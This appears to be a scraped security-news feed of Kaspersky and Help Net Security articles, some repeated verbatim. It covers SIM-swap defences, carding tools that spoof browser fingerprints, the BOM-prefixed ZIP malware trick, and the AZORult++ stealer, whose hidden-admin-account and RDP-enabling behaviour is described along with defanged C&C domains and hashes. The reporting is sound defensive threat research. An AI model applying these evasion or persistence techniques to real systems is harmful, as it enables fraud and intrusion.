There’s also the possibility that the mobile owner has legitimately changed their SIM card, and therefore unable to perform an online transaction for the next 48 hours. In such cases, some of the banks we spoke to have a process that requires face-to-face verification in a branch office – a reasonable compromise in the circumstances.

Platform workflow

  1. The banks are connected to different mobile operators through a VPN connection so that all traffic is secure.
  2. The online banking system conducts a REST API query to the respective mobile operator giving the mobile number (MSISDN) and the period (24-72 hours) as arguments.
  3. The mobile operator simply returns in real time: True or False.
  4. If the query is False, the bank allows the transaction as normal. If True, the bank blocks the transaction and may request additional steps to verify the transaction.

It is important to reiterate that the mobile operator does not share personal identifiable information (PII) with a third party, in this case banks. The national regulator for communications deemed the sharing of non-identifiable information by operators with the banks to be a case of national interest.

Once the platform was implemented, the level of online banking fraud stemming from SIM swap attacks fell dramatically, with almost no cases involving banks that have implemented the anti-SIM swap platform. As a result, we saw an increase of WhatsApp hijacking in Mozambique, similar to what happened in Brazil.

Conclusion: how not to be the next victim

Voice and SMS must be avoided as authenticity mechanisms

Mobile operators rely on legacy protocols for communication such as Signaling System No. 7, or SS7, which was initially developed in the 1970s. This protocol has security flaws that allow the interception of SMS messages or voice calls. By today’s standards the phone/SMS is no longer considered a secure method of authenticity if you want to protect high-value information such as bank accounts. An attack on Reddit in 2018 was a wake-up call for most companies.

The National Institute of Standards and Technology (NIST) in the USA explicitly deprecated the use of SMS for 2FA in a special publication, stating:

Verifiers SHOULD consider risk indicators such as device swap, SIM change, number porting, or other abnormal behavior before using the PSTN to deliver an out-of-band authentication secret.” (NIST 800-63B)

Some banks use software tokens that can be bound to a phone IMEI number (unique identifier); however, the difficult process of enrollment and maintaining changes, for example, when the user replaces the phone, deter many financial institutions.

When possible, we recommend users avoid two-factor authentication via SMS, opting instead for other ways, such as generating an OTP in a mobile app (like Google Authenticator) or using a physical token. Unfortunately, some online services don’t offer an alternative; in that case, the user needs to be aware of the risks.

The new era of biometrics

Some operators have implemented additional security mechanisms that require the user to authenticate through voice biometrics using a passphrase such as “my voice is my password” – the technology works reasonably well, even detecting if the voice is a recording, or if the user has flu. However, the major stumbling block that we observed is the very low enrollment base. Besides, it’s considered an expensive solution, especially for emerging markets, and requires some additional effort to integrate with backend systems.

Automated SMS: “Your number will be deactivated from this SIM card.”

When a SIM change is requested, operators can implement an automated message that’s sent to the number alerting the owner that there’s been a SIM change request and if it’s not authorized, the subscriber must contact the fraud hotline. This will not prevent the hijacking itself, it will instead alert the subscriber so that they can respond faster in the case of malicious activity. The main drawback is that the subscriber may be outside the coverage area.

Some carriers have implemented an additional layer of confirmation for any case of SIM activation, offering the option of configuring a password in their systems. This password will be required for any changes associated with your number, such as big changes in your monthly bill or even when you need a new SIM card. Talk to your carrier to check if they already offer this additional security for your number.

Process improvement

As we mentioned above, some processes contain weaknesses, especially in emerging markets. It’s important to dissect all the stages of the process and understand what the underlying weaknesses are. In the case of Mozambique, there’s a thriving black market that makes it possible to obtain fake documents. These documents can then be presented to operators as proof of identity for SIM swaps.

Activate 2FA on WhatsApp

To avoid WhatsApp hijacking, it’s of paramount importance to activate 2FA using a six-digit PIN on your device. In the event of hijacking, you’ll have another layer of security that is not so easy to bypass.

Request your number be unlisted from TrueCaller and similar apps

TrueCaller is a crowdsourced phone book. It allows people to be identified through their mobile number. However, as we mentioned before, fraudsters use this tool to find out more information about you. You can, and should, request that your number is unlisted from this global phone book.

Despite the fact that attacks on 2FA with the use of tools such as Evilginx are becoming more sophisticated, software tokens still provide a reasonable level of security by today’s standards. Whilst there is no silver bullet solution, we believe that declaring the death of SMS-based 2FA is the way to go. This is especially true when it comes to online banking, social media and email services.



Securelist

Hacking healthcare: A call for infosec researchers to probe biomedical devices

It is a brave new connected world out there and there is no shortage of cybersecurity risks associated with everything we do. We can’t even be sure that the technologies that keep as alive and healthy will work as intended if malicious actors set their sights on them. With innovative attacks against a variety of biomedical devices being demonstrated seemingly every day, ransomware attacks might end up to be the least of our and the … More

The post Hacking healthcare: A call for infosec researchers to probe biomedical devices appeared first on Help Net Security.

Securelist: Digital Doppelgangers

Carding exists for over 20 years. And it is not dead yet. It is alive, and even more – it is being actively developed by cybercriminals. The “good” old method of entering stolen credit card information into online store forms to buy goods and services or using online payment system accounts for the same purpose still works like a charm. Of course, the process has become more sophisticated, and it is certainly not so easy to do as it used to be 10 years ago, but unfortunately it is still possible.

The modern financial cyberfrauds, sophisticated targeted attacks on banks like Carbanak and Silence, hundreds of families of banking Trojans, etc. It had all started with carding forums many years ago. Carding is the cradle of modern financial cybercrime. As before, bank cards, payment systems and online banking frauds are the most valuable criminal sources of wealth.

A study by Juniper Research estimates that losses from online payment frauds will reach 43 billion USD by 2023, up from 22 billion USD in 2018, making anti-fraud and cybersecurity measures a top concern for the industry. And this is not surprising – every day cybercriminals develop new methods and tools to bypass anti-fraud protection systems, they develop malware to help them in their activities, create services and stores, discuss ways to defeat protection mechanisms on Darknet forums and channels. From the famous Cardingplanet forum to Darknet stolen card stores – financial cybercrime schemes were not dead at all during all these years. They have evolved and become more dangerous than ever.

Digital fingerprint protection

How do modern anti-fraud systems protect users from online fraud? They employ various models and combinations of multiple technical and analytical methods. But in simple terms, any anti-fraud system must identify a fraudster and block his attempt to accomplish an illegal transaction involving a bank card or payment system account. To identify fraudsters and separate them from legitimate buyers the anti-fraud system uses various mechanisms designed to verify the user’s digital identity mask, and if it knows this mask to be legitimate or the mask is a new and unique one, it will not throw the “red flag”. As a result, the user behind the mask is recognized to be a legitimate one, and his query, such as an attempt to make a purchase using the provided bank card details, will be approved. If the user’s digital identity appears suspicious, the transaction will be canceled or put on hold for an additional manual check. Additional authentication typically includes a request to provide extended information like bank card expiry date or CVV number, or possibly also a verification call from the online store or payment system operator for voice verification.

As such, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device and personal behavioral attributes of the user himself. The first part, the device fingerprint, includes:

  • IP address (external and local)
  • Screen information (screen resolution, window size)
  • Firmware version
  • Operating system version
  • Browser plugins installed
  • Timezone
  • Device ID
  • Battery information
  • Audio system fingerprint
  • GPU info
  • WebRTC IPs
  • TCP/IP fingerprint
  • Passive SSL/TLS analysis
  • Cookies
  • and many more

The device may have over 100 attributes used for browsing.

The second part of the digital identity is the behavioral analysis. Modern anti-fraud solutions analyze the user’s social network accounts (third-party cookies check) and various aspects of his/her behavior, including:

  • Time spent at online store website
  • Clicks on website location
  • Interest-related behavior (items of interest, typical amount of money spent, digital or real merchandise, etc.)
  • Mouse/touchscreen behavior
  • System configuration changes

The anti-fraud system may “red flag” various tricks, but the main idea is to make sure that the user’s collected digital identity had been used for transactions before, such transactions had been legitimate, or that the digital fingerprint is completely unique and used for the first time. This is why, if a cybercriminal uses the same machine for multiple attempts to buy from the same online shore using different bank cards details or stolen payment system login/password pairs, such illegal transactions will be declined. Anti-fraud systems can check the user’s collected fingerprint against the local database of fraudster device fingerprint patterns and, if any of them should match the one being used for the online purchase attempt, the transaction will be immediately blocked.

Fingerprint example

But the bad guys are always looking for ways to defeat the anti-fraud safeguards. They do in-depth research work to find out how anti-fraud systems work, they analyze browser traffic using different local analysis proxy tools to understand protection system scripts and queries. They study the information gathered from devices to create unique digital fingerprints of its users.

The next thing they do is try to substitute the system’s real fingerprint with the fake one. They try to manipulate queries and supply unique values in response to every query from the anti-fraud mechanism. Or, as a more advanced alternative, they substitute the requested values with the already existing ones – stolen from someone else’s PC.

Genesis Store

Cybercriminals soon became aware that unique fingerprints from users’ PCs make valuable information useful to many of their own kind. They began devising malware to steal fingerprints from users’ machines and selling such fingerprints along with other stolen data from the same machines, including user accounts, logins, passwords and browser cookies collected from various online services – from stores and payment systems to bank accounts. With our cybercrime threat intelligence technologies we were able to identify and analyze the biggest marketplace for this kind of data – the Genesis Store.

Genesis Store is an online cybercriminal invitation-based private market for stolen digital fingerprints. At the moment it offers more than 60k+ stolen bot profiles. The profiles include: browser fingerprints, website user logins and passwords, cookies, credit card information. The price varies from 5 to 200 dollars per profile – it heavily depends on the value of the stolen information. For example, if the bot has a login/password pair from an online bank account, the price is higher. As the marketplace owners have explained in their Darknet forum thread, the price is calculated automatically using a unique algorithm.

Genesis Store homepage

Bots for sale

Genesis Store has a configurable search panel that allows searching for specific bots. Logins and passwords from a particular website, the victim’s country, operating system, date the profile first appeared at the market – everything is searchable.

Genesis search panel

Genesis Store owners want to make the use of stolen profiles as easy as possible, so they have developed a special .crx plugin for Chromium-based browsers. The plugin allows installing stolen digital profiles into the cybercriminal’s own browser with a single mouse click for him to become a doppelganger of the victim. After that the bad guy only needs to connect to a proxy server with an IP address from the victim’s location and he can bypass the anti-fraud systems’ verification mechanisms, pretending to be a legitimate user.

Genesis plugin

Fingerprint settings in Genesis plugin

For the customers who don’t want to buy real fingerprints, there is also an option to generate unique ones. Genesis Store gives its customers an opportunity to use Genesis algorithms and the plugin to generate random fingerprints that can be used, for example, to enter stolen bank card information into online store forms: such unique browser fingerprints will be properly configured, so the anti-fraud system will not be alarmed.

Genesis fingerprint generator

The dark sphere

Another tool widely used to bypass anti-fraud systems is the Tenebris Linken Sphere browser. Its developers position it as the perfect browser for anonymity, and in fact it has been used for carding for years. Unlike the Genesis plugin, Sphere is a fully functional browser with advanced fingerprint configuration capabilities, automatic proxy server validity testing and usage options, etc. It even features a user activity emulator – cybercriminals can program it to open the desired websites, follow links, stay on websites for a given length of time, etc. Simply put, to trick the anti-fraud systems’ behavior analysis modules. The Tenebris Linken Sphere developers have also created a marketplace of unique fingerprints that can be used with Sphere browsers.

Tenebris website

Unlike Genesis, Sphere uses a subscription-based licensing system. One month’s worth of the browser usage costs 100$. With the fingerprints market access thrown in, the price is 500$ per month.

Tenebris Sphere licenses

Sphere has much deeper fingerprint configuration options for generated fingerprints. Most of the parameters are fully adjustable for an opportunity to create exactly the fingerprint one needs to mimic a real user.

Configuration panel

Configuration panel

 

Conclusion

Antifraud systems are rapidly developing. They introduce new protection mechanisms to fend off fraudsters, while fraudsters develops new tools to break through the protection layers. The sums of money lost to carding attacks are huge, and cybercriminals are most certain to scale up these malicious activities.

The security departments of financial organizations must always look for ways to counter such threats. Extra two-factor authentication for any transaction initiated using a bank card or payment system is an absolute necessity these days, even if the user’s digital profile appears legit to the protection system. Even though it is not very convenient for users to complete the extra authentication routine each time they want to buy online, it is the most effective safeguard against carding attacks for the present.

In addition, new user behavior analysis methods must be developed and implemented together with custom fingerprinting technologies that may include hardware-based fingerprint collection arrangements operating on a deeper level than currently available. Additional biometric authentication should be considered as well.

Kaspersky Lab continuously researches financial cybercrime to provide timely protection against the hostile activities.



Securelist

Digital Doppelgangers

Carding exists for over 20 years. And it is not dead yet. It is alive, and even more – it is being actively developed by cybercriminals. The “good” old method of entering stolen credit card information into online store forms to buy goods and services or using online payment system accounts for the same purpose still works like a charm. Of course, the process has become more sophisticated, and it is certainly not so easy to do as it used to be 10 years ago, but unfortunately it is still possible.

The modern financial cyberfrauds, sophisticated targeted attacks on banks like Carbanak and Silence, hundreds of families of banking Trojans, etc. It had all started with carding forums many years ago. Carding is the cradle of modern financial cybercrime. As before, bank cards, payment systems and online banking frauds are the most valuable criminal sources of wealth.

A study by Juniper Research estimates that losses from online payment frauds will reach 43 billion USD by 2023, up from 22 billion USD in 2018, making anti-fraud and cybersecurity measures a top concern for the industry. And this is not surprising – every day cybercriminals develop new methods and tools to bypass anti-fraud protection systems, they develop malware to help them in their activities, create services and stores, discuss ways to defeat protection mechanisms on Darknet forums and channels. From the famous Cardingplanet forum to Darknet stolen card stores – financial cybercrime schemes were not dead at all during all these years. They have evolved and become more dangerous than ever.

Digital fingerprint protection

How do modern anti-fraud systems protect users from online fraud? They employ various models and combinations of multiple technical and analytical methods. But in simple terms, any anti-fraud system must identify a fraudster and block his attempt to accomplish an illegal transaction involving a bank card or payment system account. To identify fraudsters and separate them from legitimate buyers the anti-fraud system uses various mechanisms designed to verify the user’s digital identity mask, and if it knows this mask to be legitimate or the mask is a new and unique one, it will not throw the “red flag”. As a result, the user behind the mask is recognized to be a legitimate one, and his query, such as an attempt to make a purchase using the provided bank card details, will be approved. If the user’s digital identity appears suspicious, the transaction will be canceled or put on hold for an additional manual check. Additional authentication typically includes a request to provide extended information like bank card expiry date or CVV number, or possibly also a verification call from the online store or payment system operator for voice verification.

As such, the user’s digital identity is a digital fingerprint – a combination of system attributes that are unique to each device and personal behavioral attributes of the user himself. The first part, the device fingerprint, includes:

  • IP address (external and local)
  • Screen information (screen resolution, window size)
  • Firmware version
  • Operating system version
  • Browser plugins installed
  • Timezone
  • Device ID
  • Battery information
  • Audio system fingerprint
  • GPU info
  • WebRTC IPs
  • TCP/IP fingerprint
  • Passive SSL/TLS analysis
  • Cookies
  • and many more

The device may have over 100 attributes used for browsing.

The second part of the digital identity is the behavioral analysis. Modern anti-fraud solutions analyze the user’s social network accounts (third-party cookies check) and various aspects of his/her behavior, including:

  • Time spent at online store website
  • Clicks on website location
  • Interest-related behavior (items of interest, typical amount of money spent, digital or real merchandise, etc.)
  • Mouse/touchscreen behavior
  • System configuration changes

The anti-fraud system may “red flag” various tricks, but the main idea is to make sure that the user’s collected digital identity had been used for transactions before, such transactions had been legitimate, or that the digital fingerprint is completely unique and used for the first time. This is why, if a cybercriminal uses the same machine for multiple attempts to buy from the same online shore using different bank cards details or stolen payment system login/password pairs, such illegal transactions will be declined. Anti-fraud systems can check the user’s collected fingerprint against the local database of fraudster device fingerprint patterns and, if any of them should match the one being used for the online purchase attempt, the transaction will be immediately blocked.

Fingerprint example

But the bad guys are always looking for ways to defeat the anti-fraud safeguards. They do in-depth research work to find out how anti-fraud systems work, they analyze browser traffic using different local analysis proxy tools to understand protection system scripts and queries. They study the information gathered from devices to create unique digital fingerprints of its users.

The next thing they do is try to substitute the system’s real fingerprint with the fake one. They try to manipulate queries and supply unique values in response to every query from the anti-fraud mechanism. Or, as a more advanced alternative, they substitute the requested values with the already existing ones – stolen from someone else’s PC.

Genesis Store

Cybercriminals soon became aware that unique fingerprints from users’ PCs make valuable information useful to many of their own kind. They began devising malware to steal fingerprints from users’ machines and selling such fingerprints along with other stolen data from the same machines, including user accounts, logins, passwords and browser cookies collected from various online services – from stores and payment systems to bank accounts. With our cybercrime threat intelligence technologies we were able to identify and analyze the biggest marketplace for this kind of data – the Genesis Store.

Genesis Store is an online cybercriminal invitation-based private market for stolen digital fingerprints. At the moment it offers more than 60k+ stolen bot profiles. The profiles include: browser fingerprints, website user logins and passwords, cookies, credit card information. The price varies from 5 to 200 dollars per profile – it heavily depends on the value of the stolen information. For example, if the bot has a login/password pair from an online bank account, the price is higher. As the marketplace owners have explained in their Darknet forum thread, the price is calculated automatically using a unique algorithm.

Genesis Store homepage

Bots for sale

Genesis Store has a configurable search panel that allows searching for specific bots. Logins and passwords from a particular website, the victim’s country, operating system, date the profile first appeared at the market – everything is searchable.

Genesis search panel

Genesis Store owners want to make the use of stolen profiles as easy as possible, so they have developed a special .crx plugin for Chromium-based browsers. The plugin allows installing stolen digital profiles into the cybercriminal’s own browser with a single mouse click for him to become a doppelganger of the victim. After that the bad guy only needs to connect to a proxy server with an IP address from the victim’s location and he can bypass the anti-fraud systems’ verification mechanisms, pretending to be a legitimate user.

Genesis plugin

Fingerprint settings in Genesis plugin

For the customers who don’t want to buy real fingerprints, there is also an option to generate unique ones. Genesis Store gives its customers an opportunity to use Genesis algorithms and the plugin to generate random fingerprints that can be used, for example, to enter stolen bank card information into online store forms: such unique browser fingerprints will be properly configured, so the anti-fraud system will not be alarmed.

Genesis fingerprint generator

The dark sphere

Another tool widely used to bypass anti-fraud systems is the Tenebris Linken Sphere browser. Its developers position it as the perfect browser for anonymity, and in fact it has been used for carding for years. Unlike the Genesis plugin, Sphere is a fully functional browser with advanced fingerprint configuration capabilities, automatic proxy server validity testing and usage options, etc. It even features a user activity emulator – cybercriminals can program it to open the desired websites, follow links, stay on websites for a given length of time, etc. Simply put, to trick the anti-fraud systems’ behavior analysis modules. The Tenebris Linken Sphere developers have also created a marketplace of unique fingerprints that can be used with Sphere browsers.

Tenebris website

Unlike Genesis, Sphere uses a subscription-based licensing system. One month’s worth of the browser usage costs 100$. With the fingerprints market access thrown in, the price is 500$ per month.

Tenebris Sphere licenses

Sphere has much deeper fingerprint configuration options for generated fingerprints. Most of the parameters are fully adjustable for an opportunity to create exactly the fingerprint one needs to mimic a real user.

Configuration panel

Configuration panel

 

Conclusion

Antifraud systems are rapidly developing. They introduce new protection mechanisms to fend off fraudsters, while fraudsters develops new tools to break through the protection layers. The sums of money lost to carding attacks are huge, and cybercriminals are most certain to scale up these malicious activities.

The security departments of financial organizations must always look for ways to counter such threats. Extra two-factor authentication for any transaction initiated using a bank card or payment system is an absolute necessity these days, even if the user’s digital profile appears legit to the protection system. Even though it is not very convenient for users to complete the extra authentication routine each time they want to buy online, it is the most effective safeguard against carding attacks for the present.

In addition, new user behavior analysis methods must be developed and implemented together with custom fingerprinting technologies that may include hardware-based fingerprint collection arrangements operating on a deeper level than currently available. Additional biometric authentication should be considered as well.

Kaspersky Lab continuously researches financial cybercrime to provide timely protection against the hostile activities.

Hackers Remotely Steer Tesla Model S Using Autopilot System

Security researchers managed to take remote control of the Autopilot feature of Tesla Model S car using a wireless gaming keypad, highlighting the potential security issues with next-generation automobiles' Advanced Driver Assistance Systems (ADAS) that are meant to enhance driver safety.

The post Hackers Remotely Steer Tesla Model S Using...

Read the whole entry... »

Related Stories

Kaspersky Lab official blog: On the dangers of popular television series

Despite an increasing number of people preferring to stream their TV shows and generally opting for legally obtained content, pirates and BitTorrent sites hold their ground. And because, from a legal standpoint, torrent sites are in a gray-fading-into-black area, they have been a playground of choice for cybercriminals disguising their malicious files as useful stuff.

The serial threat

The easiest to deceive among torrent site users are those looking to download software: Slip in a different executable and the user’s hooked. However, scammers are interested in anything that is popular with users, and television series might be the hottest thing these days, so these, too, are being used as disguise for all kinds of malware. So, we decided to analyze what dangers a wish to download a popular TV show from a torrent site may bring upon you.

We used IMDB and Rotten Tomatoes ratings to select 31 television series and downloaded anonymized statistics on them from our KSN cloud service to find out what types of malware users who dealt with the shows have encountered.

Guessing what show would prove the most popular among scammers was easy: It’s Game of Thrones. According to our statistics, Game of Thrones–related malware species that attacked users in 2018 numbered almost 10,000 — or 9,986 to be exact. These malicious programs attempted to infect the users’ machines more than 120,000 times. That is just the year 2018, and the statistics are limited to users of our solutions, so the total number of attacks worldwide should be far larger.

Most times, malware tries to pass as the first or the final episode. The very first episode of the first season of Game of Thrones, “Winter is Coming,” is the absolute leader in the number of attacks.

The runner-up among TV shows, both in terms of users attacked and the number of attacks, is The Walking Dead. These two lead by a significant margin: Arrow, in third place overall, accounted for about two-thirds the number of users attacked, and in terms of the number of attacks it was used for represents less than one-third.

What you might get instead of your TV show

If someone is seeding something disguised as a TV show, and it’s not a TV show, then it is likely to be real malware: some type of Trojan. Our statistics suggest that you are most likely to encounter the WinLNK Trojan, which is capable of downloading other malware.

Also very likely is becoming the happy owner of one of two types of so-called not-a-virus software: adware or downloaders. Neither of these will bring you any particular joy. Adware throws ads at you whenever possible, and downloaders will likely be an intermediate step to getting adware … or something worse.

How to know you have downloaded malware instead of a TV show

April through May is going to be intense: The final season of Game of Thrones hits the screens first, followed by the third season of the popular Westworld, and then it just goes on from there. That means lots of us will be watching and downloading shows, whereas rogues will be doubling or even tripling their efforts to spread infections camouflaged as the public’s well-loved TV series.

To stay safe you have to be alert. First and foremost, we advise against dealing with illegal distribution channels and in favor of official channels. Yes, you have to pay for those, but that is much safer.

If you still intend to use torrent sites, then at least you need to learn to tell if what you have downloaded is the real thing or a decoy. Here is how to know the difference:

  • Look at the file size. One episode encoded with decent quality will never be smaller than several gigabytes.
  • Never trust downloaders, link files with an.lnk extension or any other intermediates offered for downloading video content. A video file will never have an .exe or .msi extension. Keep your eyes open: Scammers will often name their files something like The.Walking.Dead.S06E04.FASTSUB.VOSTFR.HDTV.XviD-ZT.avi.exe to give them a more legitimate appearance.
  • Before you download or play back anything online — every time — check if you are on the right site. Make sure the URL has absolutely no typos. Scammers are really fond of creating malicious copies of websites with addresses that differ from the original by just a character or two.
  • Read our detailed study on television series and malware associated with them on Securelist. Forewarned is forearmed.
  • Use a reliable antivirus solution. If you are unwilling to pay for content, something tells us that our Kaspersky Free will be the best option for you.


Kaspersky Lab official blog

Automatically and invisibly encrypt email as soon as it is received on any trusted device

While an empty email inbox is something many people strive for, most of us are not successful. And that means that we probably have stored away hundreds, even thousands, of emails that contain all kinds of personal information we would prefer to keep private. What users see E3 as their insecure email + their devices = secure encrypted email. Current defenses, such as Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extensions (S/MIME), rely on … More

The post Automatically and invisibly encrypt email as soon as it is received on any trusted device appeared first on Help Net Security.

The return of the BOM

There’s nothing new in Brazilian cybercriminals trying out new ways to stay under the radar. It’s just that this time around the bad guys have started using a method that was reported in the wild years ago.

Russian gangs used this technique to distribute malware capable of modifying the hosts file on Windows systems. Published by McAfee in 2013, the UTF-8 BOM (Byte Order Mark) additional bytes helped these malicious crews avoid detection.

Since these campaigns depended on spear phishing to increase the victim count, the challenge was to fool email scanners and use a seemingly corrupted file that lands in the victim’s inbox.

The first indicator appears when the user tries to open the ZIP file with the default file explorer and sees the following error:

The error message suggests the file is corrupt, but when we check its contents we see something strange in there.

Zip header prefixed by UTF-8 BOM

Instead of having the normal ZIP header starting with the “PK” signature (0x504B), we have three extra bytes (0xEFBBBF) that represent the Byte Order Mark (BOM) usually found within UTF-8 text files. Some tools will not recognize this file as being a ZIP archive format, but will instead recognize it as an UTF-8 text file and fail to extract the malicious payload.

However, utilities such as WinRAR and 7-Zip ignore this data and extract the content correctly. Once the user extracts the file with any of these utilities they can execute it and infect the system.

The file is successfully extracted by WinRAR

The malicious executable acts as a loader for the main payload which is embedded in the resource section.

Resource table showing the resource containing the encrypted data

Encrypted DLL stored in resource section

The content stored inside the resource, encrypted with a XOR-based algorithm, is commonly seen in different malware samples from Brazil. The decrypted resource is a DLL that will load and execute the exported function “BICDAT”.

Code used to load the extracted DLL and execute the exported function BICDAT

This library will then download a second stage payload which is a password-protected ZIP file and encrypted with the same function as the embedded payload. After extracting all the files, the loader will then launch the main executable.

Code executed by BICDAT function

Strings related to Banking RAT malware

The final payload that’s delivered is a variant of a Banking RAT malware, which is currently widespread in Brazil and Chile.

Kaspersky Lab products can extract and analyze compressed ZIP files containing the Byte Order Mark without any problem.

Indicators of compromise

087b2d745bc21cb1ab7feb6d3284637d
3f910715141a5bb01e082d7b940b3552
60ce805287c359d58e9afd90c308fcc8
c029b69a370e1f7b3145669f6e9399e5

Securelist: The return of the BOM

There’s nothing new in Brazilian cybercriminals trying out new ways to stay under the radar. It’s just that this time around the bad guys have started using a method that was reported in the wild years ago.

Russian gangs used this technique to distribute malware capable of modifying the hosts file on Windows systems. Published by McAfee in 2013, the UTF-8 BOM (Byte Order Mark) additional bytes helped these malicious crews avoid detection.

Since these campaigns depended on spear phishing to increase the victim count, the challenge was to fool email scanners and use a seemingly corrupted file that lands in the victim’s inbox.

The first indicator appears when the user tries to open the ZIP file with the default file explorer and sees the following error:

The error message suggests the file is corrupt, but when we check its contents we see something strange in there.

Zip header prefixed by UTF-8 BOM

Instead of having the normal ZIP header starting with the “PK” signature (0x504B), we have three extra bytes (0xEFBBBF) that represent the Byte Order Mark (BOM) usually found within UTF-8 text files. Some tools will not recognize this file as being a ZIP archive format, but will instead recognize it as an UTF-8 text file and fail to extract the malicious payload.

However, utilities such as WinRAR and 7-Zip ignore this data and extract the content correctly. Once the user extracts the file with any of these utilities they can execute it and infect the system.

The file is successfully extracted by WinRAR

The malicious executable acts as a loader for the main payload which is embedded in the resource section.

Resource table showing the resource containing the encrypted data

Encrypted DLL stored in resource section

The content stored inside the resource, encrypted with a XOR-based algorithm, is commonly seen in different malware samples from Brazil. The decrypted resource is a DLL that will load and execute the exported function “BICDAT”.

Code used to load the extracted DLL and execute the exported function BICDAT

This library will then download a second stage payload which is a password-protected ZIP file and encrypted with the same function as the embedded payload. After extracting all the files, the loader will then launch the main executable.

Code executed by BICDAT function

Strings related to Banking RAT malware

The final payload that’s delivered is a variant of a Banking RAT malware, which is currently widespread in Brazil and Chile.

Kaspersky Lab products can extract and analyze compressed ZIP files containing the Byte Order Mark without any problem.

Indicators of compromise

087b2d745bc21cb1ab7feb6d3284637d
3f910715141a5bb01e082d7b940b3552
60ce805287c359d58e9afd90c308fcc8
c029b69a370e1f7b3145669f6e9399e5



Securelist

Algorithms can now find bugs in computer chips before they are made

In early 2018, cybersecurity researchers discovered two security flaws they said were present in almost every high-end processor made and used by major companies. UPEC product development team (l to r): Mo Fadiheh, Wolfgang Kunz, Dominik Stoffel. Known, ominously, as Spectre and Meltdown, these flaws were troubling because they represented a new type of breach not previously known that could allow hackers to infer secret data – passwords, social security numbers, medical records – from … More

The post Algorithms can now find bugs in computer chips before they are made appeared first on Help Net Security.

Top 7 Blockchain Stocks to Boost Your Portfolio

Blockchain stocks are ones that you may not want to miss the boat on adding to your portfolio. They have the potential to turn into substantial investments, […]

The post Top 7 Blockchain Stocks to Boost Your Portfolio appeared first on Hacked: Hacking Finance.

Securelist: AZORult++: Rewriting history

The AZORult Trojan is one of the most commonly bought and sold stealers in Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many comment leavers recommend it.

But at the back end of 2018, the main seller, known under the handle CrydBrox, stopped selling the malware:

“All software has a shelf life. It’s run out for AZORult.
It is with joy and sadness that I announce that sales are closed forever.”

Some attribute the move to AZORult 3.2 having become too widely available, likewise the source code of the botnet control panel. This version of the malware spread to other forums where even users without special skills can download and configure it for their own purposes. So the imminent demise of AZORult was apparently down to a lack of regular updates and its overly wide distribution. Yet the story of AZORult does not end there.

In a nutshell

AZORult is a Trojan stealer that collects various data on infected computers and sends it to the C&C server, including browser history, login credentials, cookies, files from folders as specified by the C&C server (for example, all TXT files from the Desktop folder), cryptowallet files, etc.; the malware can also be used as a loader to download other malware. Kaspersky Lab products detect the stealer as Trojan-PSW.Win32.Azorult. Our statistics show that since the start of 2019, users in Russia and India are the most targeted.


Geography of users attacked by Trojan-PSW.Win32.Azorult, 01.01.2019 — 03.18.2019

From Delphi to C++

In early March 2019, a number of malicious files detected by our products caught the eye. Although similar to AZORult already known to us, unlike the original malware, they were written not in Delphi, but in C++. A clear hint at the link between them comes from a section of code left by the developer.

It appears that the acolytes of CrydBrox, the very one who pulled the plug on AZORult, decided to rewrite it in C++; this version we call AZORult++. The presence of lines containing a path to debugging files likely indicates that the malware is still in development, since developers usually try to remove such code as soon as feasible.

AZORult++ starts out by checking the language ID through a call to the GetUserDefaultLangID() function. If AZORult++ is running on a system where the language is identified as Russian, Armenian, Azerbaijani, Belarusian, Georgian, Kazakh, Tajik, Turkmen, or Uzbek, the malware stops executing.

A more detailed analysis reveals that the C++ version is deficient compared to AZORult 3.3, the last iteration to be sold. In particular, there is no loader functionality and no support for stealing saved passwords from many of the browsers supported by AZORult 3.3. At the same time, many signature features of the Delphi-based version 3.3 are present in AZORult++, including the algorithm for communication with the C&C server, the command format, the structure and method of storing harvested data, and encryption keys.

Like AZORult 3.3, AZORult++ uses an XOR operation with a 3-byte key to encrypt data sent to the C&C server. What’s more, this key we had already encountered in various modifications of version 3.3.


Examples of different versions of AZORult in operation (data encrypted using XOR)

The malware collects stolen data in RAM and does not write to the hard drive to keep its actions hidden. A comparison of the data sent in the first packet (the ID of the infected device) shows that AZORult++ uses a shorter string than AZORult 3.3 for identification:

The server response also contains far less data. In version 3.3, the response contained a command in the form “++++-+–+-“, specifying the bot configuration and a link for downloading additional malware, plus several binary files needed for the stealer to work. The string “++++-+–+-” is parsed by the Trojan character-by-character; “+” in a specific position signifies a command to execute certain actions (for example, harvesting of cryptowallet files). The current version of AZORult++ employs a shorter, yet similar command:

It is worth mentioning separately that the resulting configuration string is not processed correctly; the code execution does not depend on the value “+” or “-” in the string, since the characters are checked against \x00 for a match. In other words, the resulting command does not affect the stealer’s behavior:

This seems to be an error on the part of the developer, which suggests again that the project is in the very early stages of development. Going forward, these bugs are expected to be eliminated and the functionality of AZORult++ expanded.

++ up the sleeve

For all its flaws, AZORult++ could actually be more dangerous than its predecessor due to its ability to establish a remote connection to the desktop. To do so, AZORult++ creates a user account using the NetUserAdd() function (username and password are specified in the AZORult++ code), before adding this account to the Administrators group:

Next, AZORult++ hides the newly created account by setting the value of the Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist registry key to 0. Likewise, through setting registry key values, a Remote Desktop Protocol (RDP) connection is allowed:

The malicious cherry on the cake is a call to ShellExecuteW() to open a port to establish a remote connection to the desktop:

After that, the infected computer is ready to accept the incoming RDP connection, which allows the cybercriminal — armed with the victim’s IP address and account information — to connect to the infected computer and seize complete control of it.

Conclusion

During development, AZORult underwent several changes related to the expansion of its functionality. Moreover, despite its many flaws, the C++ version is already more threatening than its predecessor due to the ability to establish a remote connection to the desktop. Because AZORult++ is likely still in development, we should expect its functionality to expand and bugs to be eliminated, not to mention attempts to distribute it widely under a name that buyers will recognize.

IoC

C&C servers
http://ravor.ac[.]ug
http://daticho.ac[.]ug

MD5
08EB8F2E441C26443EB9ABE5A93CD942
5B26880F80A00397BC379CAF5CADC564
B0EC3E594D20B9D38CC8591BAFF0148B
FE8938F0BAAF90516A90610F6E210484



Securelist

AZORult++: Rewriting history

The AZORult Trojan is one of the most commonly bought and sold stealers in Russian forums. Despite the relatively high price tag ($100), buyers like AZORult for its broad functionality (for example, the use of .bit domains as C&C servers to ensure owner anonymity and to make it difficult to block the C&C server), as well as its high performance. Many comment leavers recommend it.

